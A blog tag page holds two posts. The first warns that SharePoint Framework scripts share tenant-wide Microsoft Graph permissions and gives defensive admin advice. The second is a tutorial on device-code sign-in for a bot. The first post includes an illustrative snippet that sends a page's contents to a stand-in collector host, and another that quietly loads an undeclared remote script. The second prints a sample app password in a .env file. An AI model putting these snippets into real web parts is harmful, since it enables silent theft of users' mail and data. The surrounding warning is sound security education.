Contents tagged with Microsoft Graph

  • SharePoint Framework and Microsoft Graph access – convenient but be VERY careful

    Tags: SharePoint Framework, Office 365, Azure AD, Microsoft Graph, SharePoint Online, Security

    SharePoint Framework (SPFx) is a fantastic development model on top of (modern) SharePoint for user interface extensibility, and it has evolved tremendously over the last year since it became generally available. The framework provides JavaScript extensibility in a controlled manner, compared to the older JavaScript injection mechanisms we used to extend (classic) SharePoint, and it comes with a lot of power.

    Using SharePoint Framework, our JavaScript has access to the whole DOM in the browser, meaning that we can do essentially whatever we want with the user interface. Of course we shouldn’t – only certain parts of the DOM are allowed/supported for modification: the custom client-side Web Parts we build (that squared box) or specific placeholders (currently only two of them: top and bottom). For me that’s fine (although there’s a need for some more placeholders), but if you want to destroy the UX it is all up to you.

    In our client-side solutions we can call out to web services, fetch data, present it to the user and even allow the end-user to manipulate that data. For a while now we’ve had limited access to Microsoft Graph, where Microsoft has done the auth plumbing for us, and the latest version (1.4.1) adds a whole new set of APIs to call Microsoft Graph, with our own specified permission scopes, and even custom web services protected by Azure AD. Very convenient, and you can build some fantastic (demo) solutions with this to show the power of UX extensibility in SharePoint Online.

    However – there are some serious security disadvantages that you probably don’t think about, or even care about, if you’re a small business, a happy hacker or someone who just wants to build stuff. For me – designing and building solutions for larger enterprises – this scares me and my clients…a lot!

    Some perspective

    Let’s take a step back and think about JavaScript injection (essentially SPFx is JavaScript injection – just with a fancier name and in a somewhat controlled way). These are all very basic things, but from recent “social conversations” it seems like “people” forget them.

    JavaScript running on a web page has all the power that an end-user has – one could even say more power, since it can do things the user doesn’t see or isn’t aware of. I already mentioned that JavaScript can modify the DOM – hiding, adding or moving elements around. But it can also execute code that is not necessarily visible. A good example is using Microsoft Application Insights to log the behavior of the user or the application – which seems like a good thing in most cases (although I don’t think that many users of AppInsights understand how GDPR affects this – but that’s another discussion). We could also use JavaScript to call web services, use the information we have on the page to manipulate the state of the page, and send data from our page to another page. All without the user noticing it. For good or for bad…let’s come back to the latter in a minute or so.
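
    To make that concrete, here is a deliberately simplified, hypothetical sketch (the collector URL is made up) of what “sending data from our page to another page” can look like – a handful of lines that read what the user sees and quietly post it somewhere else:

        // Hypothetical illustration only: any script running on the page can do this.
        // Read whatever is rendered on the page (the user's own view of the data)...
        const pageContent: string = document.body.innerText;

        // ...and quietly ship it off to a server the script author controls.
        fetch('https://collector.example.com/ingest', {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({ url: location.href, content: pageContent })
        });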

    No Script sites and the NoScript flag

    Before SharePoint Framework, Microsoft introduced “No Script” sites to mitigate the issue of arbitrary JavaScript running in sites and pages. All modern Team sites, based on Office 365 Groups, and OneDrive sites are No Script sites. As an admin you can control the behavior of newly created SharePoint sites using the settings in the SharePoint admin center (under Settings):

    Bad settings for this...

    Depending on when your tenant was created (before or after the addition of this setting) your default settings may be different. My recommendation is, of course, to Prevent users from running custom scripts, to ensure that you don’t get some rogue scripts in there (see below).

    This setting can also be set on individual sites using the following SharePoint Online PowerShell command:

    # Prevent custom scripts on this site (use $false to allow them)
    Set-SPOSite https://contoso.sharepoint.com/sites/site `
        -DenyAddAndCustomizePages $true

    More information here: “Allow or prevent custom script”

    This setting not only affects JavaScript injection on a site, it also prohibits the use of sandboxed solutions and of SharePoint Designer – all good things!

    Script Editor Web Part – the wolf in sheep’s clothing

    “Our favorite” SharePoint extensibility mechanism, specifically for citizen developers (or whatever you prefer to call them), has been the Script Editor Web Part (SEWP). As an editor of a site in SharePoint we can just drag the SEWP onto a page and add arbitrary scripts to get the job done.

    The aforementioned No Script setting will make the Script Editor Web Part unavailable on these sites.

    The Script Editor Web Part does not exist in modern SharePoint. The whole idea of modern SharePoint and SPFx is that we (admins/editors) should have a controlled and managed way to add customizations to a site – and of course the SEWP is on a collision course with that; having that option would violate the whole idea.

    You can read much more about this in the SharePoint Patterns and Practices article called “Migrate existing Script Editor Web Part customizations to the SharePoint Framework”.

    But there is now a “modern” version of the Script Editor Web Part available as part of the SharePoint Patterns and Practices samples repository (which is a bit of a shocker to me). This solution bypasses the whole idea of SharePoint Framework – controlled and governed JavaScript in SharePoint Online. And of course it is being used by a lot of users/tenants – since it’s simple and it works. If you do use this solution you really should continue reading…

    SharePoint Framework and Microsoft Graph = power?

    How does this relate to SharePoint Framework then? As I said, with SharePoint Framework we now have a very easy way to access Microsoft Graph (and other Azure AD secured endpoints) with pre-consented permission scopes. As a developer, when you build a SharePoint Framework solution you can ask to be granted permissions to Microsoft Graph and other resources, and the admin grants these permissions in the new SharePoint Online admin center under API management.

    API Management in new SPO admin center

    For instance, you might want to build a Web Part that shows the user’s e-mail or calendar on your portal page, or you might want access to read and write task information. The possibilities are endless and that is great – or is it?
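
    As a rough sketch of what such a Web Part does once the permission has been granted, reading the signed-in user’s upcoming calendar events looks something like this (this uses the MSGraphClient/msGraphClientFactory shape from later SPFx releases; in 1.4.1 the Graph client was still in preview, so treat it as illustrative only):

        import { MSGraphClient } from '@microsoft/sp-http';

        // ...inside a web part method, e.g. onInit or render:
        this.context.msGraphClientFactory.getClient()
            .then((client: MSGraphClient): void => {
                client.api('/me/events')
                    .select('subject,start,end')
                    .top(5)
                    .get((error: any, events: any) => {
                        if (!error) {
                            // Render the upcoming events in the web part
                            console.log(events.value);
                        }
                    });
            });

    A dozen lines of code – which is exactly why it is so tempting, and exactly why the granted scope deserves scrutiny.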

    I think this is a huge area of concern. Imagine these user stories:

    “As a user I would like to see my calendar events on my Intranet” – a pretty common request I would say. This requires the SPFx Web Part developer to ask for permission to read the user’s calendar.

    “As a user I would like to see and be able to update my Planner tasks” – another very common request. This requires the SPFx Web Part developer to ask for Read and Write access to all Groups (that’s just how it is…).

    Both of these scenarios open up your SharePoint Online environment to malicious attacks in a very severe way. Of course the actual permission has to be approved by an admin – but how many admins really understand what’s happening when the business cries “we need this feature”?

    Note: this is not just a SharePoint Framework issue, but SPFx makes it so easy that you probably don’t see the forest for the trees. The same is true for the many “Intranet-in-a-box” vendors that have built similar services to access mail, calendars etc. from the Graph. It’s still JavaScript, and if you allow a single user to add a script it can be misused.

    Rogue scripts

    Once you have granted permissions to Microsoft Graph, triggered by a single request from that fancy calendar Web Part, all other scripts in the whole tenant have those permissions. Your seemingly harmless Web Part has suddenly exposed your calendar for reading to any other Web Part. Assume that the admin now installs a weather Web Part (downloaded or acquired from a third party). This weather Web Part is also allowed to read the user’s e-mail, even though it never requested it. If that vendor goes rogue, or already is, they can – without the user knowing – send all the calendar or e-mail details to a remote server, while just displaying the weather. This requires some social engineering, of course, to make the admin install the Web Part. But what about allowing the modern Script Editor Web Part? Piss an employee off, and with just some simple JavaScript knowledge that user can create a sweet-looking cat-of-the-day web part – or even a hidden one – with the modern Script Editor Web Part, send the boss to that page, and read all of the boss’s calendar events or e-mails, sending them to some random location somewhere…

    You still think this is a good idea?

    And what about the second user story, where we need full read and write access to all groups just to be able to manipulate tasks in Planner? There is not much you can do if you’re building this web part – you are opening up so many more possibilities for “working with” groups and their associated features. This is not a SharePoint Framework thing, but a drawback in how Microsoft Graph works with permissions and the lack of contextual or fine-grained scopes in Azure AD. The same goes for reading and writing data in SharePoint sites – Azure AD/Microsoft Graph cannot restrict you to a single site or list; you have access to all of them.

    Remember how SharePoint Add-ins have site collection or list scoped permissions? I guess you all remember how we complained about that back then as well. Those were some sweet days and we really want those features back. Well, we still have them – SharePoint Add-ins are probably still the best way to protect your users and your IP…

    As I stated above, all SPFx solutions have to be added to the tenant app catalog – but we also have the option of a site collection scoped app catalog. That is another vector for inserting seemingly nice solutions that can take advantage of the permissions you granted at the tenant level.

    The grey area between modern and classic sites

    Currently most SharePoint Online tenants are in a transition period between classic and modern sites. That is, they have built their SharePoint Online environment the “classic way”, most often requiring script-enabled sites, and now they want to transition to modern sites, without these scripting capabilities. Should they just add the new modern Script Editor Web Part, or should they turn off scripting for all sites?

    If you turn scripting off I can almost guarantee that a lot of your sites will become useless – and in many cases your whole Intranet; this happens specifically with many of the “Intranet-in-a-box” vendor solutions. So be careful.

    So, what should I do?

    If you still think it is very valuable to build solutions with SPFx and Microsoft Graph, the first thing you MUST do is ensure that there is not a single site in your tenant with scripting enabled. You can do a quick check with this sample PowerShell command:

     Get-SPOSite -Limit All |
         Where-Object { $_.DenyAddAndCustomizePages -eq 'Disabled' }

    This will list all the site collections that still allow JavaScript execution, for instance via the Script Editor Web Part. If there is a single site in that list, stop what you’re doing and don’t even consider granting SPFx any permissions.

    I wish we had this kind of notification and warning on the permission grant page in the new SharePoint admin center, to make it very obvious for admins.

    Secondly, be very thoughtful about which solutions you install in your app catalog. Do you know the vendor? Do you know their code? Is their code hosted on a vendor CDN (a warning sign – since they can update it without you knowing)? Do you have multiple vendors? Who has access to do this?

    So, you really need to do proper due diligence on the code you let into your SharePoint Online tenant.

    A note on the CDN issue: when you add an SPFx solution to the app catalog, all “registered” external script locations are listed. But this is not a guarantee – it only shows what is registered in the manifest. As a developer you can request other resources dynamically without them ever showing up on this screen.
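
    To illustrate, nothing prevents bundled web part code from pulling in additional scripts at runtime with a few lines like these (the URL is hypothetical):

        // Hypothetical sketch: dynamically load a script that is not declared
        // anywhere in the SPFx manifest, so it never shows up in the app catalog UI.
        const script: HTMLScriptElement = document.createElement('script');
        script.src = 'https://some-vendor-cdn.example.com/extra-payload.js';
        document.head.appendChild(script);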

    Summary

    I hope this gave you the chills, and that you start reflecting on those seemingly harmless weather web parts you install. As an admin, developer or purchaser of SharePoint Online customizations you MUST think this over:

    1. Do we have a plan to move from script-enabled sites to ALL sites having custom scripts disabled?
    2. Do we have the knowledge and skill to understand what our developers and vendors are adding to our SharePoint Online tenant?
    3. Do we understand the specific permission requirements involved?

    I also hope (and know) that the SharePoint Framework product team listens; this is an area which needs to be addressed. We want to build these nicely integrated solutions, but we cannot do it at the expense of security. And it’s NOT about security in SharePoint or SharePoint Framework – it is about how web browsers work. What we need is:

    1. Visibility – make it visible to admins what is really happening in their tenant: script-enabled sites, SEWP instances etc.
    2. Isolation – we need to be able to isolate our web parts, so that they and their permission scopes cannot be intercepted or misused. In the web world I guess iframes are the only solution.
    3. Granularity – Azure AD permission granularity. It is not sustainable to give applications these broad permissions (Group.ReadWrite.All); I want to give my app access to write to one Planner plan only, not to all groups.

    Thanks for reading all the way to the end! I have oversimplified some parts, but if you have any concerns, questions or issues with my thinking – don’t hesitate to debate, confront, question or agree with this post.

  • Using Device Codes to authenticate Bots with Azure AD

    Tags: Bot Framework, Microsoft Teams, npm, Microsoft Azure, Microsoft Graph, Azure AD

    I’ve been building chat bots for a while now and I’m seeing more and more requests to build them for enterprises. For bots targeted at the enterprise, perhaps hosted in Microsoft Teams, one of the first requirements is that they should get data from internal systems, most specifically from Office 365 through the Microsoft Graph. The problem is that we need to authenticate and authorize the user, through Azure AD, to be able to access these resources. A Microsoft Bot Framework bot does not inherit the credentials or security tokens from the application it is being invoked from, so we need to handle this ourselves. For instance, even though you have logged in to Microsoft Teams, Skype for Business or your Intranet, your security token cannot (and should not) be passed to the bot.

    This is not mission impossible, and there are multiple ways of implementing it. For instance, if you’re building Bot Framework bots using .NET you can use AuthBot, and with node.js there’s the botauth module. There are also other (a bit weird and specialized) ways of doing this using the backchannel.

    All of these are custom implementations that either send an already existing access token to the bot or use home-brewed magic number generators. But there is a much simpler way of doing this – using the native and built-in features of the Azure Active Directory Authentication Library (ADAL), specifically the OAuth 2.0 Device Flow.

    In this post I will demonstrate how to create a bot from scratch and use the device flow to sign in and get data from Microsoft Graph. It will all be built using node.js and TypeScript – but the procedure is the same for any kind of environment.

    Creating the bot

    First of all we need to create a bot in the Bot Framework portal. Give the bot a name, handle and description, and specify the messaging endpoint. You can use localhost for testing, but in the end you need a publicly available URL to be able to use the bot in the different channels. In this sample we need to make sure that the messaging endpoint ends with /api/messages. Then you need to create a Microsoft App ID and a password – just follow the wizard and take a note of the ID and especially the password, since you will only see it once. Once you’re done, save your bot.

    Configuring the App platform for the bot

    The bot created in the Bot Framework portal is essentially an Application in the Microsoft Application Registration Portal. In order to use this Application ID with Azure AD and Microsoft Graph, we need to log in to that portal, find our newly registered bot and add a platform to it. In this case let’s add a Native Application. You don’t have to configure it any further; it just needs to have a platform.

    Setting the platform for the App

    In this portal you can also add the delegated permissions for your bot, under Microsoft Graph Permissions. For the purpose of this demo we only need the User.Read permission.

    Let’s write some code

    The next step is to actually start writing some code. This will be done in node.js, using TypeScript and a set of node modules. The most important node modules used in this demo are:

    • webpack – bundles our TypeScript files
    • ts-loader – webpack plugin that transpiles TypeScript to JavaScript
    • express – node.js webserver for hosting our Bot end-point
    • adal-node – ADAL node.js implementation
    • @microsoft/microsoft-graph-client – a Microsoft Graph client
    • botbuilder – Bot Framework bot implementation

    All the code in this sample can be found in this GitHub repo: https://github.com/wictorwilen/device-code-bot. To use it, just clone the repo and run npm install. To be able to run it locally or debug it, add a file called .env and in that file add your Application ID and password as follows:

    MICROSOFT_APP_ID=fa781336-3114-4aa2-932e-44fec5922cbd
    MICROSOFT_APP_PASSWORD=SDA6asds7aasdSDd7

    The hosting of the bot, using express, is defined in the /src/server.ts file. For this demo that file contains nothing specific, apart from starting the implementation of the bot – which is defined in /src/devicecodebot.ts.
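
    In essence the hosting boils down to something like the following sketch (simplified; not the verbatim contents of server.ts in the repo):

        import * as express from 'express';
        import * as builder from 'botbuilder';
        import { DeviceCodeBot } from './devicecodebot'; // the bot class described below

        // The connector authenticates the bot against the Bot Framework channels
        const connector = new builder.ChatConnector({
            appId: process.env.MICROSOFT_APP_ID,
            appPassword: process.env.MICROSOFT_APP_PASSWORD
        });

        // Expose the messaging endpoint that the Bot Framework portal points to
        const app = express();
        app.post('/api/messages', connector.listen());

        const port = Number(process.env.PORT) || 3007;
        app.listen(port, () => console.log(`Bot listening on port ${port}`));

        // Start the bot implementation
        const bot = new DeviceCodeBot(connector);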

    In the bot implementation you will find a constructor that creates two dialogs – the default dialog and a dialog for sign-in – and initializes the ADAL token cache.

    constructor(connector: builder.ChatConnector) {
        this.Connector = connector;
        // In-memory token cache used by ADAL
        this.cache = new adal.MemoryCache();

        this.universalBot = new builder.UniversalBot(this.Connector);
        this.universalBot.dialog('/', this.defaultDialog);
        this.universalBot.dialog('/signin', this.signInDialog);
    }

    The implementation of the default dialog is very simple. It just checks whether we have already signed in – but since this demo never persists that state, the login flow is always started by invoking the sign-in dialog.
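
    In other words, the default dialog looks roughly like this (a sketch, not the verbatim repo code):

        // Default dialog: start the sign-in flow unless we already have a token
        private defaultDialog = (session: builder.Session) => {
            if (session.userData.accessToken) {
                session.send('You are already signed in.');
            } else {
                session.beginDialog('/signin');
            }
        };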

    The sign-in dialog will create a new ADAL AuthenticationContext and then use that context to acquire a user code.

    var context = new AuthenticationContext('https://login.microsoftonline.com/common',
        null, this.cache);
    context.acquireUserCode('https://graph.microsoft.com',
        process.env.MICROSOFT_APP_ID, '',
        (err: any, response: adal.IUserCodeResponse) => {
            ...
        });

    The result of this operation (IUserCodeResponse) is an object with a set of values, of which we should pay attention to the following:

    • userCode – the code to be used by the user for authentication
    • message – a friendly message containing the verification url and the user code
    • verificationUrl – the url where the end user should use the user code (always aka.ms/devicelogin)

    We use this information to construct a Bot Builder sign-in card and send it back to the user:

    var dialog = new builder.SigninCard(session);
    dialog.text(response.message);
    dialog.button('Click here', response.verificationUrl);
    var msg = new builder.Message();
    msg.addAttachment(dialog);
    session.send(msg);

    This allows us to invoke the authorization flow for the bot from any Bot Framework channel. The end-user clicks the button, which opens a web browser (at aka.ms/devicelogin), and that page asks for the user code. After the user has entered the code, they are asked to authenticate and, if it is the first time, to consent to the permissions requested by the bot.

    In our code we then need to wait for this authorization, authentication and consent to happen. That is done as follows:

    context.acquireTokenWithDeviceCode('https://graph.microsoft.com',
        process.env.MICROSOFT_APP_ID, response,
        (err: any, tokenResponse: adal.IDeviceCodeTokenResponse) => {
            if (err) {
                session.send(DeviceCodeBot.createErrorMessage(err));
                session.beginDialog('/signin');
            } else {
                session.userData.accessToken = tokenResponse.accessToken;
                session.send(`Hello ${tokenResponse.givenName} ${tokenResponse.familyName}`);
                ...
            }
        });

    This operation can of course fail and we need to handle that – in this case by sending the error as a message and restarting the sign-in flow. If it succeeds we get all the data we need to continue (IDeviceCodeTokenResponse), such as the access token, refresh token, user id, etc. In a real-world scenario you should of course store the refresh token, in case the access token expires. This is also the point where we would mark the user as signed in and redirect subsequent dialogs to whatever we want the bot to do.
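
    Refreshing an expired access token with adal-node could then look roughly like this (a sketch – it assumes we stored tokenResponse.refreshToken in session.userData earlier, and real code needs proper error handling):

        // Sketch: exchange the stored refresh token for a new access token
        context.acquireTokenWithRefreshToken(
            session.userData.refreshToken,   // assumed to have been saved after sign-in
            process.env.MICROSOFT_APP_ID,
            'https://graph.microsoft.com',
            (err: any, refreshed: any) => {
                if (!err) {
                    session.userData.accessToken = refreshed.accessToken;
                }
            });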

    Now we can use this access token to grab some data from Microsoft Graph. The following code takes a very simplistic approach – it does not handle expired access tokens – and just fetches the job title of the user and sends it back:

    const graphClient = MicrosoftGraph.Client.init({
        authProvider: (done: any) => {
            done(null, session.userData.accessToken);
        }
    });
    graphClient
        .api('/me/jobTitle')
        .version('beta')
        .get((err: any, res: any) => {
            if (err) {
                session.send(DeviceCodeBot.createErrorMessage(err));
            } else {
                session.endDialog(`Oh, so you're a ${res.value}`);
            }
        });

    Run the application

    To run the application first we need to transpile and bundle it using webpack like this:

    npm run-script build

    Then we start the express server like this:

    npm run-script run

    To test it locally we need the Bot Framework Emulator. Download it, run it and configure it to connect to http://localhost:3007/api/messages. Type anything in the emulator to start the sign-in experience.

    Testing the bot with the Bot Framework emulator

    As soon as you’ve written something, the sign-in card will be displayed. When you click the button, a browser window opens and you are asked to type the code. Once you’ve done that you are asked to sign in and consent. Shortly after, the bot comes alive again and types the user’s name and, if all works well, also the user’s job title.

    Consenting the device code bot

    If you decide to publish your bot (for instance to Azure – all the necessary files are in the GitHub repo to Git-publish it to Azure) you can also use the bot in other channels, for instance Skype:

    The device code bot in Skype

    Summary

    As you’ve now seen, it is very easy to create a simple and elegant sign-in flow for your bots, without sacrificing any security, using standard features of ADAL and OAuth. This works nicely with any Azure AD account, with or without MFA.

About Wictor...

Wictor Wilén is the Nordic Digital Workplace Lead working at Avanade. Wictor has achieved the Microsoft Certified Architect (MCA) - SharePoint 2010, Microsoft Certified Solutions Master (MCSM) - SharePoint and Microsoft Certified Master (MCM) - SharePoint 2010 certifications. He has also been awarded Microsoft Most Valuable Professional (MVP) for seven consecutive years.
